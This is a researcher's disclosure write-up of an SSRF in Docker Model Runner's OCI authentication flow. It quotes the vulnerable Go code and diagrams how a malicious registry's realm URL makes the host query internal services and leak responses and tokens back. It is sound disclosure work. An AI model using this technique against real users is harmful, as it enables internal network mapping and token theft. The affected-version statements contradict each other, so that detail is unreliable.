Exploiting Docker Model Runner’s OCI Authentication Flow
Disclaimer: This research was conducted independently. Views expressed are my own and do not represent my employer.
Introduction
After finishing up my last training and exam (OSWE), I finally found some time to pick a few targets and dig into open source software. I regularly use Docker and Ollama to run local models and decided that I was mainly interested in researching on software I actually use.
This got me thinking about how models are distributed. For Docker, models are distributed in OCI format. To pull down a model and run locally, you just run “docker model pull registry.example.com/llama3”. Everyone is doing it these days. New liberated ChatGPT models getting uploaded, custom models trained to find subdomains, fine-tuned models for every use case you can think of. AI is moving at lightning speed and I truly believe security will catch up later. This is exactly why I decided that serving models using an OCI registry would be a prime target for my next research venture.
Background: OCI and Docker Model Runner
The OCI (Open Container Initiative) format is the standard for how container images get packaged and distributed. When you docker pull nginx:latest, your client talks to a registry, grabs a JSON manifest that lists the image layers, then downloads each layer blob by its SHA-256 digest. This same protocol is now being reused for AI models - same manifests, same blobs, same registries.
When you run docker model pull, Docker Model Runner uses an OCI client to fetch the model from a registry. The model weights(GGUF files) are stored as blobs, and metadata lives in the config. Once pulled, DMR loads the model into llama.cpp which runs as a host-native process
- not in a container. Keep that in mind.
DMR exposes its API on three surfaces, and none of them require authentication (this is by design):
- The Docker socket (host processes + containers)
- model-runner.docker.internal (any container on the Docker network)
- localhost:12434 (configured in Docker Model settings in Desktop)
Any container on your system can hit any of these endpoints. Including POST /models/create, which triggers a pull from whatever registry you point it at. Even a registry that we control.

EEEEEEEEEvil
The Attack Surface
So I started thinking, if I pwn a web application and end up in a container (common), could I use my Docker Model Runner internal API access to enumerate the underlying host? Could I find a way to read files, enumerate services, possibly get code execution? Lets say I stand up a malicious OCI registry - what can I do to somehow influence the underlying host to do some action on my behalf?
So I cloned the model-runner source and started looking at what an attacker actually controls during a pull. The manifest, the config, the blobs, HTTP headers from the registry. Most of this is parsed with no security issues (that I found). But then I got to the authentication flow, specifically the WWW-Authenticate header.
The WWW-Authenticate Header
When a client makes an unauthenticated request to a protected OCI registry, the registry responds with a 401 and a WWW-Authenticate header:
HTTP/1.1 401 Unauthorized WWW-Authenticate: Bearer realm="https://auth.docker.io/token",service="registry.docker.io",scope="repository:library/nginx:pull"
This is standard HTTP auth. The Bearer scheme tells the client it needs a token, and the parameters tell it where to get one:
- realm - the URL where the client should request a token
- service - the name of the service the token is for
- scope - what access the token should grant
The realm parameter is the interesting one. It’s a URL that the client is supposed to make a GET request to in order to obtain a bearer token. Normally this points to something like https://auth.docker.io/token.
Whats interesting is the realm comes from the registry’s response. If you control the registry, you control the realm URL. And if the client follows that URL without validating it…

Roll Safe
Finding the Bug
The vulnerable code lies in the Exchange() function in pkg/distribution/oci/remote/transport.go:
// transport.go
tokenURL, err := url.Parse(pr.WWWAuthenticate.Realm) // we control realm
req, err := http.NewRequestWithContext(ctx, http.MethodGet, tokenURL.String(), http.NoBody)
// Docker Hub credentials get forwarded to whatever realm points to
if auth != nil {
cfg, err := auth.Authorization()
if cfg.Username != "" && cfg.Password != "" {
req.SetBasicAuth(cfg.Username, cfg.Password)
}
}
resp, err := client.Do(req) // SSRF here
No validation on the realm URL. No scheme check, no hostname restriction, no check that the realm even matches the registry you’re pulling from. HTTP, HTTPS, localhost, internal IPs, cloud metadata - all fair game. Go’s default HTTP client also follows up to 10 redirects, so even if the URL looks benign the registry can bounce you wherever it wants.
And it gets better. When the token exchange fails (which it will, since we’re pointing it at some random internal service), the full response body gets included in the error:
if resp.StatusCode != http.StatusOK {
body, _ := io.ReadAll(resp.Body)
return nil, fmt.Errorf("token request failed with status %d: %s",
resp.StatusCode, string(body)) // full response reflected
}
So not only can we make model-runner send GET requests to arbitrary internal endpoints, we get the response back (with some limitations… stay tuned).
The Attack Chain
There is two sides to exploiting this vulnerability (and I didn’t realize this until I found the bug). Yes, we can use this to enumerate host-local services as an attacker inside of a container.
Here is an overview of how the attack chain works as a local attacker:
Attacker's Docker Model Runner Internal
Registry (runs on HOST) Service
| | |
|<-- POST /models/create --------| |
| "pull evil.com/model" | |
| | |
|-- GET /v2/ ------------------>| |
| | |
|-- 401 ----------------------->| |
| WWW-Authenticate: Bearer | |
| realm="http://127.0.0.1: | |
| 9200/_cluster/health" | |
| | |
| |-- GET /_cluster/health ->|
| |<-- { cluster data } ---|
| | |
|<-- error: "no token in | |
| bearer response: | |
| { cluster data }" | |
BUT, we can also (with a supply chain compromise or by standing up a malicious OCI registry) use this as a remote attacker to attemtp to collect any sensitive information leaked from local endpoints on victims who may pull our model. On Docker Desktop 4.40 (model-runner v0.1.4) and model-runner versions v1.0.0 through v1.0.10, the full response body gets reflected back in the error message. So if a victim pulls our malicious model, we can read the full response from whatever internal endpoint we targeted.
On v1.0.11 and later, the full response reflection was removed. But we can still:
- Map the internal network - the SSRF still fires on every target, so we know which services are alive and reachable even if we can’t read the full response
- Exfiltrate token fields - if the internal service’s JSON response contains a token, Token, or access_token field (any casing), that value gets sent back to our registry as an Authorization: Bearer header. AWS metadata, OAuth endpoints, Consul, Vault - a lot of services include a token field in their responses. One supply chain compromise (looking at you LiteLLM) could lead to thousands of people having local endpoints hit and their responses/tokens exfiltrated.
And this isn’t limited to one endpoint per pull. By crafting a manifest with multiple layers and forcing re-authentication on each request, we can rotate the realm URL to a different internal target each time. One ‘docker model pull’ from our malicious OCI could lead to 20+ endpoints being enumerated.
This means that even on the latest version, an unsuspecting user who pulls our model gives us a map of their internal network and any tokens we can grab along the way.
Here is an overview of how the attack chain works as a remote attacker:
Attacker's Registry Model Runner (HOST) Internal Service
| | |
|-- 401 + realm=http://internal --->| |
| |-- GET http://internal --->|
| |<-- {"token": "SECRET"} ---|
| | |
|<-- GET /v2/.../manifests/tag ------| |
| Authorization: Bearer SECRET | |
| | |
Attacker reads SECRET from | |
the Authorization header | |
Proof Of Concept
The PoC has three pieces:
- Fake internal service (Elasticsearch). leaks sensitive data on a simple GET request.
- A malicious OCI registry that serves a fake model manifest.
- The trigger - either a container making a request to model-runner.docker.internal (local attacker) or a user running docker model pull (remote attacker).
This has been simplified for the PoC, and as a remote attacker we would need to stand up an OCI registry accessible over HTTPS to have a real shot at exploiting this in the wild.
In this ‘scenario’, we’ve compromised a container and want to see what’s running on the host. We exec into a container, make a single request to model-runner, and get back data from an Elasticsearch instance running on the host’s localhost - a service the container should never be able to reach. The registry would be an attacker owned, external OCI registry hosting the target model.

SSRF via malicious OCI model pull
Impact
- Any container on Docker Desktop can read from host-local services with no privileges and no authentication
- A malicious OCI registry can scan a victim’s internal network when they pull a model
- On older versions (all versions up to v1.1.28), the full response body is reflected back to the attacker
- On newer versions, services that return a token field still have that value exfiltrated
- Model Runner is enabled by default in Docker Desktop. No configuration needed to be vulnerable.
Fix
Update Docker Desktop to latest version!
Disclosure Timeline
Docker was lightning fast in their responses and super quick to triage my report (and notify me I’d be getting some swag <3)
Date disclosed: 03/19/2026
Initial response: 03/20/2026
Confirmed vulnerability: 03/24/2026
Notified CVE issued: 03/30/2026
Links
Docker Github Disclosure: https://github.com/docker/model-runner/security/advisories/GHSA-x2f5-332j-9xwq